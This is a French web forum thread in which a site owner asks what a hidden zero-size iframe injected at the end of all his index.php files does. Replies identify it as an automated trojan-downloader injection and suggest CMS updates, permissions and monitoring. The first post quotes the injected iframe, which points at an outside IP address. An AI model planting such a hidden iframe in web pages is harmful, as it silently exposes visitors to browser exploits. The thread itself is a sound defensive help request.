IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

injection ? iframe en php


Sujet :

Sécurité

  1. #1
    Membre régulier

    Profil pro
    Inscrit en
    Décembre 2003
    Messages
    165
    Détails du profil
    Informations personnelles :
    Âge : 42
    Localisation : Suisse

    Informations forums :
    Inscription : Décembre 2003
    Messages : 165
    Points : 95
    Points
    95
    Par défaut injection ? iframe en php
    Bonjour,

    Mes sites web ont été hacké. Je me suis retrouvé avec le bout de code ci dessous à la fin de tous mes index.php.

    Ma question question est : à quoi sert exactement cette iframe invisible?

    Ma deuxième question est : y a t il des systèmes d'alerte qui peuvent me prévenir des qu'il y a des injections de code de cette manière?

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <iframe src="http://124.217.252.62/~admin/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

  2. #2
    Membre éclairé
    Profil pro
    Inscrit en
    Janvier 2006
    Messages
    603
    Détails du profil
    Informations personnelles :
    Âge : 42
    Localisation : Belgique

    Informations forums :
    Inscription : Janvier 2006
    Messages : 603
    Points : 700
    Points
    700
    Par défaut
    Hébergement mutualisé, dédié ?

    votre infection c'est le trojan downloader, ce n'est pas une attaque directe, mais bien une attaque automatique, et vous devriez revoir votre sécurité!
    coffee powered

  3. #3
    Membre régulier

    Profil pro
    Inscrit en
    Décembre 2003
    Messages
    165
    Détails du profil
    Informations personnelles :
    Âge : 42
    Localisation : Suisse

    Informations forums :
    Inscription : Décembre 2003
    Messages : 165
    Points : 95
    Points
    95
    Par défaut
    Citation Envoyé par eod Voir le message
    Hébergement mutualisé, dédié ?
    Mutualisé.

    Mais il fait quoi ce bout de code?

    Est ce qu'il y a des scans anti virus qui peuvent parcourir mes pages web?

  4. #4
    Membre éclairé
    Profil pro
    Inscrit en
    Janvier 2006
    Messages
    603
    Détails du profil
    Informations personnelles :
    Âge : 42
    Localisation : Belgique

    Informations forums :
    Inscription : Janvier 2006
    Messages : 603
    Points : 700
    Points
    700
    Par défaut
    Ce n'est pas un virus hébergé sur le serveur, mais une faille de sécurité via la quelle on injecte un lien caché vers le script qui exploite les failles de navigateurs internet, etc.

    C'est très courant sur des configurations mal protégées!

    Vous pouvez commencer par mettre à jour votre CMS si une mise à jour est disponible, et d'empêcher les droits d'accès sur vos fichiers et dossiers(ftp>>>chmod).


    Via le fichier .htaccess vous pouvez créer des règles de réécriture vous aidant à sécuriser votre configuration et avoir des url' seo friendly.
    Enfin, il existe plein de tutoriels à ce sujet, CMSMS également dispose d'un wiki que vous pouvez consulter.


    Pour supprimer l'injection de tous vos sites, j'ignore comment cela est possible d'une manière automatique via ce CMS, mais faite-le après avoir sécurisé votre configuration. En effet, ce sera plus facile si vous gérez tous vos sites via une seule interface d'administration.


    Bon courage
    coffee powered

  5. #5
    Membre régulier

    Profil pro
    Inscrit en
    Décembre 2003
    Messages
    165
    Détails du profil
    Informations personnelles :
    Âge : 42
    Localisation : Suisse

    Informations forums :
    Inscription : Décembre 2003
    Messages : 165
    Points : 95
    Points
    95
    Par défaut anti virus
    Hello,

    Est ce qu'on peut pas avoir un anti virus dans son navigateur qui fait une alerte dès qu'il y a un tel "hack" sur un site?

    Merci

  6. #6
    Membre éclairé
    Profil pro
    Inscrit en
    Janvier 2006
    Messages
    603
    Détails du profil
    Informations personnelles :
    Âge : 42
    Localisation : Belgique

    Informations forums :
    Inscription : Janvier 2006
    Messages : 603
    Points : 700
    Points
    700
    Par défaut
    Les antivirus desktop de nos jours protègent les navigateurs aussi, donc si votre site est susceptible de contenir un virus il vous avertira lors de la visite.

    Vous pouvez toutefois inscrire vos sites au centre webmaster de google, qui vous envoie un message si un de vos sites est suspect et présente une menace pour vos visiteurs, vous pouvez également vérifier manuellement via cette adresse;

    N'hésitez pas à utiliser des extensions Firefox concernant la sécurité;


    voilà en gros
    coffee powered

Discussions similaires

  1. [MySQL] limiter l'injection dun include php à un fichier
    Par chacalbobo dans le forum PHP & Base de données
    Réponses: 3
    Dernier message: 07/02/2010, 16h04
  2. iframe + javascript + php
    Par Inh[Star]Noz dans le forum Général JavaScript
    Réponses: 0
    Dernier message: 14/01/2010, 18h46
  3. iframe et php
    Par lunick dans le forum Langage
    Réponses: 4
    Dernier message: 17/06/2009, 09h43
  4. Injection MySQL depuis PHP
    Par Jayrome dans le forum Requêtes
    Réponses: 3
    Dernier message: 04/05/2009, 11h26
  5. [SQL] Protéger les requetes SQL d'injection comme du php, javascript, ect
    Par arnaudperfect dans le forum PHP & Base de données
    Réponses: 2
    Dernier message: 25/06/2007, 15h32

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo